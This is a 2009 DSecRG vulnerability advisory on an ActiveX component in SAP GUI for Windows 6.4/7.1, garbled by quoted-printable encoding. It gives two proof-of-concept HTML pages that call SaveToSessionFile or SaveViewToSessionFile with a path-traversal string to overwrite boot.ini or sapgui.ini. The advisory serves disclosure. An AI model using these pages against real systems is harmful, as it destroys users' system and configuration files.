(edited) [DSECRG-09-044] SAP GUI 7.1 Insecure Methods

=0D=0ADigital Security Research Group [DSecRG] Advisory       #DSECRG-09-044


Application:                    EnjoySAP, SAP GUI for Windows 6.4 and 7.1  =
    =20
Versions Affected:              Tested on 7100.2.7.1038 PL 7
Vendor URL:                     http://SAP.com
Bugs:                           insecure method, File owervriting
Exploits:                       YES
Reported:                       02.07.2009
Vendor response:                02.07.2009
Date of Public Advisory:        22 =F1=E5=ED=F2
CVE-number:                    =20
Author:                         Digital Security Research Group [DSecRG] (r=
esearch [at] dsec [dot] ru)



Description
***********

SAP GUI for Windows 7.1 and 6.4 contains ActiveX component EAI WebViewer3D =
( file WebViewer3D.dll) Lib GUID:    {AFBBE070-7340-11d2-AA6B-00E02924C34E}

which is contains insecure method that can overwrite any file in system.=20

Details
*******

Attacker can construct html page which call one of the wulnerable functions=
 such as:=20

1) SaveToSessionFile
2) SaveViewToSessionFile

from ActiveX component EAI WebViewer3D



Example1:

<HTML>
<BODY>
 <object id=3Dctrl classid=3D"clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"=
></object>
<SCRIPT>
function Do_1t()
 {
   File =3D "../../../../../../../../../../../../boot.ini"
   ctrl.SaveToSessionFile(File)
 }
</SCRIPT>
<input language=3DJavaScript onclick=3DDo_1t() type=3Dbutton value=3D"P0c">
</BODY>
</HTML>


Example2:

<HTML>
<BODY>
 <object id=3Dctrl classid=3D"clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"=
></object>
<SCRIPT>
function Do_1t()
 {
   File =3D "../../../../../../../../../../../../boot.ini"
   ctrl.SaveViewToSessionFile(File)
 }
</SCRIPT>
<input language=3DJavaScript onclick=3DDo_1t() type=3Dbutton value=3D"P0c">
</BODY>
</HTML>




For example we can overwrite boot.ini file or  sapgui.ini which contains al=
l connectionbs to sap servers=20


Fix Information
***************



About
*****

Digital Security is one of the leading IT security companies in CEMEA, prov=
iding information security consulting, audit and penetration testing servic=
es, risk analysis and ISMS-related services and certification for ISO/IEC 2=
7001:2005 and PCI DSS standards. Digital Security Research Group focuses on=
 application and database security problems with vulnerability reports, adv=
isories and whitepapers posted regularly on our website.


Contact:        research [at] dsecrg [dot] com
                http://www.dsecrg.com